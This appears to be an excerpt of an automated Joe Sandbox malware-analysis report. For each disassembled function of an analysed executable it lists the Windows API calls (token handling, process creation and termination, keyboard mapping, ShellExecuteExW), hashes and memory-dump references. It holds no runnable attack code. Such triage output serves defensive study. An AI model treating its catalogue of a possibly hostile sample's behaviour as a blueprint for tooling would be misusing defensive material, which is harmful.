Part of subcall function 004C0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004C0FEC
Part of subcall function 004C0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004C1002

GetLengthSid.ADVAPI32(?,00000000,004C1335), ref: 004C17AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 004C17BA
HeapAlloc.KERNEL32(00000000), ref: 004C17C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 004C17DA
GetProcessHeap.KERNEL32(00000000,00000000,004C1335), ref: 004C17EE
HeapFree.KERNEL32(00000000), ref: 004C17F5

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: ee04c69140447621f8c6c461f8666f443a99efbff887fb8c7c11584921e492fd
Instruction ID: b5009734f3815cebdcafabc7b91ce7f2b626d59c9e58d98ca6b650261a5cb122
Opcode Fuzzy Hash: ee04c69140447621f8c6c461f8666f443a99efbff887fb8c7c11584921e492fd
Instruction Fuzzy Hash: 42119D35501209EFDB509FA4CE89FBFBBA9EF42355F10402EF44197221C7399955CB68

Function 004C14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004C14FF
OpenProcessToken.ADVAPI32(00000000), ref: 004C1506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004C1515
CloseHandle.KERNEL32(00000004), ref: 004C1520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004C154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 004C1563

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 2b60eb5258ba74b629ce763c6afd469a3306d04c37b3a0164231959f0a0267ab
Instruction ID: dca1c4a3e6065d9b27e88fb7c528f4344bd73e75e4a3ee6e1d4f4728c809fafc
Opcode Fuzzy Hash: 2b60eb5258ba74b629ce763c6afd469a3306d04c37b3a0164231959f0a0267ab
Instruction Fuzzy Hash: 3311897610020DAFDF118F98DE89FEE7BA9EF49744F044029FA05A2160C3758E65EB68

Function 00483382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00483379,00482FE5), ref: 00483390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0048339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004833B7
SetLastError.KERNEL32(00000000,?,00483379,00482FE5), ref: 00483409

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9dc84161701b7576923b4e2e9e2069fd439a4d6534d5ab0ab003071c36976cd3
Instruction ID: a65a361f943eac995a0eefc0be178ee65177e213fa411deb6149fe9fd835afe5
Opcode Fuzzy Hash: 9dc84161701b7576923b4e2e9e2069fd439a4d6534d5ab0ab003071c36976cd3
Instruction Fuzzy Hash: F401F9326083117E96343F796C8592F1E94EB15F7B3200A2FF810902F2EF195D16638C

Function 00492D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00495686,004A3CD6,?,00000000,?,00495B6A,?,?,?,?,?,0048E6D1,?,00528A48), ref: 00492D78
_free.LIBCMT ref: 00492DAB
_free.LIBCMT ref: 00492DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0048E6D1,?,00528A48,00000010,00464F4A,?,?,00000000,004A3CD6), ref: 00492DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0048E6D1,?,00528A48,00000010,00464F4A,?,?,00000000,004A3CD6), ref: 00492DEC
_abort.LIBCMT ref: 00492DF2

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 1476d8095de2b781ec753c57df9fcbe15d13e2e61582d83935b1c7ac375bda79
Instruction ID: 67f02754e965f937526030bb5129f3e1b6b14f437226f7cd50ad14817069d3f2
Opcode Fuzzy Hash: 1476d8095de2b781ec753c57df9fcbe15d13e2e61582d83935b1c7ac375bda79
Instruction Fuzzy Hash: 9DF02D3154460037CE227735BE0AE5F1D556FC27A5F21063FF824D22D2DEEC880291AC

Function 004F8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00479639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00479693
Part of subcall function 00479639: SelectObject.GDI32(?,00000000), ref: 004796A2
Part of subcall function 00479639: BeginPath.GDI32(?), ref: 004796B9
Part of subcall function 00479639: SelectObject.GDI32(?,00000000), ref: 004796E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 004F8A4E
LineTo.GDI32(?,00000003,00000000), ref: 004F8A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 004F8A70
LineTo.GDI32(?,00000000,00000003), ref: 004F8A80
EndPath.GDI32(?), ref: 004F8A90
StrokePath.GDI32(?), ref: 004F8AA0

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: a42de2a76941ae7e95861a5caa53eecce19f82ef560424f38d3e0eb1494e61a2
Instruction ID: f5cc0ee81098497e2d2168862396456e8b4f53926bd4951ad218e125dd7717a8
Opcode Fuzzy Hash: a42de2a76941ae7e95861a5caa53eecce19f82ef560424f38d3e0eb1494e61a2
Instruction Fuzzy Hash: 63111B7600010DFFDF129F90DD88FAA7F6CEB08354F008026BA199A1A1CB719D65DFA4

Function 004C51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004C5218
GetDeviceCaps.GDI32(00000000,00000058), ref: 004C5229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004C5230
ReleaseDC.USER32(00000000,00000000), ref: 004C5238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 004C524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 004C5261

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: dd3b0721974cd14cce846ce3422b8324f21c56f4fbd95dc7525b948846fe5953
Instruction ID: 23cf8097396882298b3c64a9323351ffe9e58748702b6288d1efc4aa40a32b00
Opcode Fuzzy Hash: dd3b0721974cd14cce846ce3422b8324f21c56f4fbd95dc7525b948846fe5953
Instruction Fuzzy Hash: 99018F75A00708BBEB109BA69D89F5EBFB8EB48351F044066FA04E7380DA709815CFA4

Function 00461BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00461BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00461BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00461C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00461C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00461C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00461C22

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: a746f38c5eb63d5356b0e6b65d35c90df5c454da9a63154f0bbd434e6076425f
Instruction ID: 7c2036841334af885e8a88e5455f00e031f0e28479323c43baeb2a0a1a10e7f3
Opcode Fuzzy Hash: a746f38c5eb63d5356b0e6b65d35c90df5c454da9a63154f0bbd434e6076425f
Instruction Fuzzy Hash: 93016CB09027597DE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5

Function 004CEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004CEB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004CEB46
GetWindowThreadProcessId.USER32(?,?), ref: 004CEB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004CEB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004CEB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004CEB75

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: bea61ee6436ce5896b7d29be3bc28dc296941c053d10a4595e6693919bf92103
Instruction ID: c797a59cbd204a2c4bf788d92a900d360de9b17ccf1fecf6ebe917214ce2e0c3
Opcode Fuzzy Hash: bea61ee6436ce5896b7d29be3bc28dc296941c053d10a4595e6693919bf92103
Instruction Fuzzy Hash: C8F0547214015CBBE72157529E4DEFF3E7CEFCAB11F000169F601D1191DBA05A21DAB9

Function 004B7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 004B7452
SendMessageW.USER32(?,00001328,00000000,?), ref: 004B7469
GetWindowDC.USER32(?), ref: 004B7475
GetPixel.GDI32(00000000,?,?), ref: 004B7484
ReleaseDC.USER32(?,00000000), ref: 004B7496
GetSysColor.USER32(00000005), ref: 004B74B0

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 824293d7804ada54d43ba2a94691c47d77ccd7429077e006330d75f09cf1c4b6
Instruction ID: b32f0bd07172241d1340c621364c20bd2521e20cf0cf3c146f9292d97cd966a3
Opcode Fuzzy Hash: 824293d7804ada54d43ba2a94691c47d77ccd7429077e006330d75f09cf1c4b6
Instruction Fuzzy Hash: B2018B31404219FFEB105F64DE48BFA7BB5FB04312F210061F916A22A0CB311E62EB69

Function 004C1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 004C187F
UnloadUserProfile.USERENV(?,?), ref: 004C188B
CloseHandle.KERNEL32(?), ref: 004C1894
CloseHandle.KERNEL32(?), ref: 004C189C
GetProcessHeap.KERNEL32(00000000,?), ref: 004C18A5
HeapFree.KERNEL32(00000000), ref: 004C18AC

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 7ed22a89bb1d4d6c20ed98a2c9d6a61415ef4db0c01e9ab207843b4a12688e38
Instruction ID: 84b2fadf2701d0e7c27e30092df25135498bf682f66f51fdc3103e226d5be4a3
Opcode Fuzzy Hash: 7ed22a89bb1d4d6c20ed98a2c9d6a61415ef4db0c01e9ab207843b4a12688e38
Instruction Fuzzy Hash: F3E0C236004109BBDA016BA1EE4CD1ABF69FF49B22B108230F22581070CB329430EF58

Function 0046BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0046BEB3

Strings

D%SD%S, xrefs: 0046BCA5
D%S, xrefs: 0046BE9A
D%S, xrefs: 0046BCA2
D%S, xrefs: 0046BDED, 0046BD91, 0046BD1B

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%S$D%S$D%S$D%SD%S
API String ID: 1385522511-4072755704
Opcode ID: 6d780797203ce93c0562310fb69bbeb1d9d15090c93f121d706049acd9c573f4
Instruction ID: b4cedb45584bd08c6cd04278b5d36c89c5ea7ea2f716bf5967ec5517b298c486
Opcode Fuzzy Hash: 6d780797203ce93c0562310fb69bbeb1d9d15090c93f121d706049acd9c573f4
Instruction Fuzzy Hash: DF914975A00606CFCB14CF58C0906AABBF1FF59314F24816ED941EB351E739AA81DBD6

Function 004E7B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00480242: EnterCriticalSection.KERNEL32(0053070C,00531884,?,?,0047198B,00532518,?,?,?,004612F9,00000000), ref: 0048024D
Part of subcall function 00480242: LeaveCriticalSection.KERNEL32(0053070C,?,0047198B,00532518,?,?,?,004612F9,00000000), ref: 0048028A

Part of subcall function 00469CB3: _wcslen.LIBCMT ref: 00469CBD

Part of subcall function 004800A3: __onexit.LIBCMT ref: 004800A9

__Init_thread_footer.LIBCMT ref: 004E7BFB

Part of subcall function 004801F8: EnterCriticalSection.KERNEL32(0053070C,?,?,00478747,00532514), ref: 00480202
Part of subcall function 004801F8: LeaveCriticalSection.KERNEL32(0053070C,?,00478747,00532514), ref: 00480235

Strings

+TK, xrefs: 004E7E2E
Variable must be of type 'Object'., xrefs: 004E7C3A
5, xrefs: 004E7C78
G, xrefs: 004E7C7F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: +TK$5$G$Variable must be of type 'Object'.
API String ID: 535116098-4205355604
Opcode ID: cdd7dd6867f929ff5dec5d0317ff0c6e8b09395a670f28885f0407177ff15948
Instruction ID: 3c169dac6fe5a840aaefbbd3bebadeee0253a8c7ed9a4208494a23fe5bb166b6
Opcode Fuzzy Hash: cdd7dd6867f929ff5dec5d0317ff0c6e8b09395a670f28885f0407177ff15948
Instruction Fuzzy Hash: CC91AD70A04248EFCB04EF56D880DAEB7B1BF48315F10804EF8069B392DB79AE45CB59

Function 004CC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00467620: _wcslen.LIBCMT ref: 00467625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004CC6EE
_wcslen.LIBCMT ref: 004CC735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004CC79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004CC7CA

Strings

0, xrefs: 004CC6AF

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 107ee25aef00474899c4a2d838ec7e3f3f877dcde0ab39b5042aa81a0b96d548
Instruction ID: c19b5f022b2171480f0b4c33c4765c68a819bca02cebcbbd2930ee75a9c23019
Opcode Fuzzy Hash: 107ee25aef00474899c4a2d838ec7e3f3f877dcde0ab39b5042aa81a0b96d548
Instruction Fuzzy Hash: 5F51BE796053029BD7909F28C9C5F6BB7E4EB49314F040A2FF999D2290DB68D804CB5A

Function 004EAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 004EAEA3

Part of subcall function 00467620: _wcslen.LIBCMT ref: 00467625

GetProcessId.KERNEL32(00000000), ref: 004EAF38
CloseHandle.KERNEL32(00000000), ref: 004EAF67

Strings

@, xrefs: 004EAE72
<, xrefs: 004EAE6B

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 4a0e63ec0a6ba1915e8cfe8800f412121841d0f4039ed2bae89417582d34fb59
Instruction ID: d44b94916203f8818cefb2ab538d10beb4ae9b1e2282abe9e8ef55eae74b14eb
Opcode Fuzzy Hash: 4a0e63ec0a6ba1915e8cfe8800f412121841d0f4039ed2bae89417582d34fb59
Instruction Fuzzy Hash: 77716A70A00655DFCB14DF56C484A9EBBF0BF08318F04849EE816AB392D778ED55CB9A

Function 004C719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004C7206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 004C723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 004C724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004C72CF

Strings

DllGetClassObject, xrefs: 004C7242

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: f578c94c38b97fd5dceb85322211fa9a22753b6c44da6b20c75f76def7557b91
Instruction ID: 38ba50084e4bc256cd6bf6378e5baeda1c1473ed2cdde31baffd16f31563a5cc
Opcode Fuzzy Hash: f578c94c38b97fd5dceb85322211fa9a22753b6c44da6b20c75f76def7557b91
Instruction Fuzzy Hash: 3F418E79604204AFDB55CF54C884FAA7BA9EF44310F2480AEFD059F24AD7B8D945CFA8

Function 004F2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 004F2F8D
LoadLibraryW.KERNEL32(?), ref: 004F2F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 004F2FA9
DestroyWindow.USER32(?), ref: 004F2FB1

Strings

SysAnimate32, xrefs: 004F2F68

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 21931d6607114bf4b43f5c8273a4c27e0353aa97bbbdcf2364215dbf6494d73e
Instruction ID: 4a040c30fa94ae9ee03c307652aa0caff37991d3571d1a48cca4d718dbf2f709
Opcode Fuzzy Hash: 21931d6607114bf4b43f5c8273a4c27e0353aa97bbbdcf2364215dbf6494d73e
Instruction Fuzzy Hash: 4B21D17121420DABEB104F64DD80EBB37BDEB59328F10062AFA10D22A0D3B5DC51A778

Function 00484D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00484D1E,004928E9,?,00484CBE,004928E9,005288B8,0000000C,00484E15,004928E9,00000002), ref: 00484D8D
